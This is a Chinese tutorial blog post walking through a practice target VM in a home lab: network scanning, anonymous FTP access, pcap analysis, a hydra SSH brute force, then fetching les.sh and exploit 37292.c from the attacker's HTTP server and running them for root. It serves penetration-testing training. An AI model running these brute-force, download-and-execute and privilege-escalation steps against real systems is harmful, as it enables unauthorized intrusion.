一次零基础靶机渗透细节全程记录

这篇具有很好参考价值的文章主要介绍了一次零基础靶机渗透细节全程记录。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一、打靶总流程

1.确定目标:

        在本靶场中,确定目标就是使用nmap进行ip扫描,确定ip即为目标,只是针对此靶场而言。其他实战中确定目标的方式包括nmap进行扫描,但不局限于这个nmap。

2.信息收集:

        比如平常挖洞使用fofa,天眼查,ip域名等进行查,在我们这个靶场中比如信息收集包括查看源码,使用工具dirb等。

3.发现漏洞:

        那些理论比如sql注入,文件上传等,或者找到相关的系统信息,去网上找相关的exp这些都是为了拿到webshell。

4.漏洞利用:

        漏洞利用就是使用漏洞拿到webshell。

5.权限提升:

        权限提升,就是所谓的提权,因为一般进入拿到webshell后进入到服务器了都是低权限,在接下来的靶中我们的目标都是拿到root权限,所以拿到webshell后是低权限用户,这个时候我们需要一系列的方式进行提权,最后拿到root权限,即为结束。

二、打靶实例详解


文章内的靶机及脚本关注后私信获取

        1.首先将靶机以及kali启动。

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

         2.注意将两者的网络适配器均调整为NAT模式(确保二者是在同一个网段下)。

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

         3.从kali中打开终端,执行ip a命令查看kali的ip地址。

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        4.使用nmap工具来确认要打的靶机的ip地址。 

nmap -sP 192.168.190.0/24

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        在上面扫描出的ip地址中,.1、.2、.254、.138都是kali自身的一些ip地址,所以在此确认要进行攻击的靶机的ip地址为:192.168.190.139。

        5.接下来继续进行信息收集,信息收集的方面以及方式有很多,这里信息收集是针对此靶机的信息收集。

        6.扫描靶机开放了哪些端口。

nmap -p- 192.168.190.139

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        可以看到此靶机开放了21、22、80端口。其中:开放了21端口ftp,可以想到可能存在弱口令;开放了22端口ssh,可以想到对其进行爆破,然后看到80端口web端,可以对其进行常见漏洞测试。 

        7.对开放的各个端口的进行详细查看。

nmap -p- -sS -sV -A 192.168.190.139

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        8. 在各个端口的详细信息中,可以看到21端口有个Anonymous登入成功过,因此可以尝试进行弱口令登入,账户名和密码都输入为Anonymous进行尝试。 

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        9.尝试后发现确实存在弱口令问题,成功登录了进去。

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

         10.登录进去之后执行ls命令查看当前目录下有哪些文件,来继续进行信息收集。

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

         11.发现一个名为“lol.pcap”的文件,我们将其下载到我们本地。

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        12.发现是一个流量数据,因此使用wireshark工具对其进行打开。

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        13.打开后可以看到下面的内容。

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        14.我们随便点击一条流量数据,点击TCP追踪流,可以看到下面的信息,但是并没有发现有用的信息。

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        15. 将其关闭后我们可以看到软件上方的筛选信息,此时为0。

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        16.将其更改成1后再进行TCP流追踪,可以看到一个txt文件。

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        17.此时想到最开始进行扫描的时候,靶机存在开放的80端口,因此想到对其进行搜索,发现搜索结果返回404,说明搜索的结果是没用的。

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

       18.回到流量工具内,将筛选框后面的1更改为2后继续追踪TCP流,根据其英文解释,可以想到“sup3rs3cr3tdirlol”可能是一个文件的路径,因此再次尝试进行拼接。

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

         19.拼接后网页返回了下面的内容。

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        20.可以看到存在一个名为“roflmao”的文件,点击后将其下载下来。

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

         21.来到下载路径下后,使用file命令或者strings命令将文件打开。

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        22.可以看到还原出来的内容里存在下面的一句话,因此我们尝试将获得的信息再次进行拼接后搜索。

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        23.再次进行拼接搜索后进入了下面的页面。

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

         24.在这里点击“good_luck”后进入了到了下面的页面。

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        25. 在此页面内又发现了一个txt文件,点击后可以看到下面的内容,这里就相当于是一个用户名的字典,找到了有用的用户名。

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

         26.在桌面上创建一个名为user的文档来存储这些用户名。

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        27.回到浏览器的前面的页面,发现存在一个可能存在密码的文件。

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

         28.进入后又发现了一个txt文件,打开后可以看到下面的内容,因此可以想到密码有可能是Good_job_:)也有可能是Pass.txt。

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

         29.将猜想的可能的密码也放入一个txt文档中当作密码的字典。

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        30. 来到桌面路径下使用hydra工具对其进行爆破,可以看到成功将用户名和密码爆破了出来。 

hydra -L user -P password 192.168.190.139 ssh

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        31.接下来就使用爆破出来的用户名和密码进行登录,发现登录成功了。 

ssh overflow@192.168.190.139

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        32.但是发现此时的权限是低权限:

  • id为:0 root    
  • 0 < id < 1000 服务用户: 为服务提供权限  
  • 1000 <= id <=60000 普通

        因此还要进行提权,下面是linux提权的几种方式:

  • 内核提权---脏牛提权最为典型 ,内核提权一般包括3个步骤,信息收集发现版本号,找到相关版本的exp,使用找到的exp对目标发起攻击,完成提权功能。
  • 利用suid提权 
  • 利用sudo提权
  • mfs提权
  • mysql提权 包括udf mof提权方式

        33.发现进入的是一个伪终端,因此还要将其转换为真终端,执行下面的命令就将其变成了真终端。

python -c 'import pty; pty.spawn("/bin/bash")'

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        34.接下来开始提权。

        35.首先在本地开启一个web服务。

python3 -m http.server 8083

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        35. 直接执行下面的命令将脚本文件下载到靶机上,但是发现下载失败了,因为此时权限不够。

wget http://192.168.190.138:8083/les.sh

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        36.切换到tmp目录下再次进行下载,发现下载成功了,因为其是一个临时文件,所以在此目录下的权限会高一些,因此就可以成功下载了。

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

       37.下载完之后将web服务关闭,在终端内按CTRL+z。 

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

      38.给其添加一个权限后进行执行。

chmod +x les.sh

./les.sh

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        39. 这个脚本执行后会检测Linux内核版本存在哪些漏洞,检测出来的结果的颜色越深说明可以被利用的可能性越大。

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        40.接下来进行exp的利用就可以了。

        41.下面演示第二种提权方式。

        42.可以通过自己获取到Linux的版本信息,然后在kali内进行搜索。

uname -a

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        43.获取到版本信息后执行下面的命令在kali内进行搜索。

searchsploit Linux 4-Tr0ll 3.13.0

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        44.在此标红的两条就是满足条件的。

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        45.接下来的思路就是将本都的exp搞到靶机的服务器内进行运行,就可以实现提权的效果。

        46.获取到exp的绝对路径。

locate linux/local/37292.c

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        47.将其存放在桌面。

cp /usr/share/exploitdb/exploits/linux/local/37292.c /home/kali/桌面

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        48.将其打开后就可以看到exp的内容。

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        49. 再从本地开启web服务。

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        50. 将exp下载到靶机。

wget http://192.168.190.138:8085/37292.c

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        51.下载完之后将web服务关闭,在终端内按CTRL+z。 

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        52.将其进行编译和执行,此时再次查看权限,可以看到此时的权限就是root权限了。

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试

        53.查看靶机内的文件proof.txt,至此我们就成功拿下了靶机!!!

一次零基础靶机渗透细节全程记录,网络安全,打靶,提权,kali,渗透测试文章来源地址https://www.toymoban.com/news/detail-575743.html

到了这里,关于一次零基础靶机渗透细节全程记录的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【网络安全】记一次杀猪盘渗透实战

    看起来非常假的网站,这个网站是没有 cdn 的用的是 thinkphpk 框架搭建的。 先打一波 poc 没有效果 访问一下后台直接在 url 后面加/admin。 一个开源的 cms 还没有验证码尝试用 burp 进行爆破,首先在火狐上设置代理 ip 为 127.0.0.1 代理端口为 8081。 Burp 上也要设置端口为 8081,将 In

    2024年02月03日
    浏览(50)
  • 网络安全之渗透(基础知识点)

    1、 脚本语言 2、常见脚本语言 3、静态脚本于动静态脚本的区别: 3、 HTTP协议,HTTP代理 4、 CMS(B/S)内容管理系统 5、 MD5(不可逆的,常见的MD5解密网站其实是将一些明文进行MD5加密,形成一个库,在查询的时候将密文与库中的信息进行碰撞,最后得到明文) 零基础入门 对

    2024年02月11日
    浏览(75)
  • 网络安全(黑客)内网渗透基础知识

    0x01 内网概述 内网也指局域网(Local Area Network,LAN)是指在某一区域内由多台计算机互联成的计算机组。一般是方圆几千米以内。局域网可以实现文件管理、应用软件共享、打印机共享、工作组内的历程安排、电子邮件和传真通信服务等功能。 内网是封闭型的,它可以由办公

    2024年02月13日
    浏览(59)
  • 网络安全|渗透测试入门学习,从零基础入门到精通—渗透中的开发语言

    目录 前面的话 开发语言 1、html 解析 2、JavaScript 用法 3、JAVA   特性 4、PHP 作用 PHP 能做什么? 5、C/C++ 使用 如何学习 关于在渗透中需要学习的语言第一点个人认为就是可以打一下HTML,JS那些基础知识,磨刀不误砍柴工。其次,了解基本的代码后,就可以去学习相关的漏洞知

    2024年02月09日
    浏览(52)
  • 安全渗透测试网络基础知识之路由技术

    #1.静态路由技术 ##1.1路由技术种类: 静态路由技术、动态路由技术 ##1.2静态路由原理 静态路由是网络中一种手动配置的路由方式,用于指定数据包在网络中的传输路径。与动态路由协议不同,静态路由需要管理员手动配置路由表,指定目的网络和下一跳路由器的关联关系。

    2024年02月06日
    浏览(55)
  • 安全渗透测试之网络基础知识(IP地址)

    #1.IP地址介绍 注意:不同局域网需要有不同的网络部分,通过网络部分区别出网段/网络; 局域网内部,主机部分不能一样,否则会出现地址冲突 范围:0.0.0.0-255.255.255.255 表示:点分十进制 组成:由网络部分和主机部分组成 192.168.1.1 1.1.1.1 255.254.188.2 二进制:00000000 11111111 十

    2024年02月08日
    浏览(56)
  • 零基础自学网络安全/网络渗透攻防路线学习方法【建议收藏】

    1.这是一条坚持的道路,三分钟的热情可以放弃往下看了. 2.多练多想,不要离开了教程什么都不会了.最好看完教程自己独立完成技术方面的开发. 3.有时多google,baidu,我们往往都遇不到好心的大神,谁会无聊天天给你做解答. 4.遇到实在搞不懂的,可以先放放,以后再来解决. 1.web安全方

    2024年02月03日
    浏览(72)
  • 网络安全|渗透测试入门学习,从零基础入门到精通—收集信息篇

    目录 前面的话 1、收集域名信息 1.1、Whois查询 ​编辑1.2、备案信息查询  2、收集敏感信息 3、收集子域名信息 3.1、子域名检测工具 3.2、搜索引擎枚举 3.3、第三方聚合应用枚举 3.4、证书透明度公开日志枚举 本章小结 本人喜欢网络完全的一些知识,自学一些。现在写出来和大

    2024年02月08日
    浏览(53)
  • 网络安全|渗透测试入门学习,从零基础入门到精通—动态分析技术工具OllyDbg界面介绍

    目录 动态分析技术调试器 什么是OllyDbg OllyDbg能干什么 OllyDbg窗口介绍 1、反汇编面板窗口 2、信息面板窗口 3、数据面板窗口 4、寄存器面板窗口 5、栈面板窗口 动态分析技术中最重要的工具是调试器,分为用户模式和内核模式两种类型。用户模式调试器是指用来调试用户模式

    2024年02月11日
    浏览(51)
  • PWNlab靶机渗透

    安装靶机 下载地址:https://www/vulnhub.com/entry/pwnlab-init,158/ 收集靶机ip地址,由于搭建在本地使用kali自带命令 arp-scan -l nmap 扫描端口,服务 nmap -sV -p 1-65535 -A 靶机ip地址   访问80端口地址,查找可利用的功能点 发现存在upload,不过需要登录 发现一个规律每次切换网页时,存在p

    2024年02月13日
    浏览(32)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包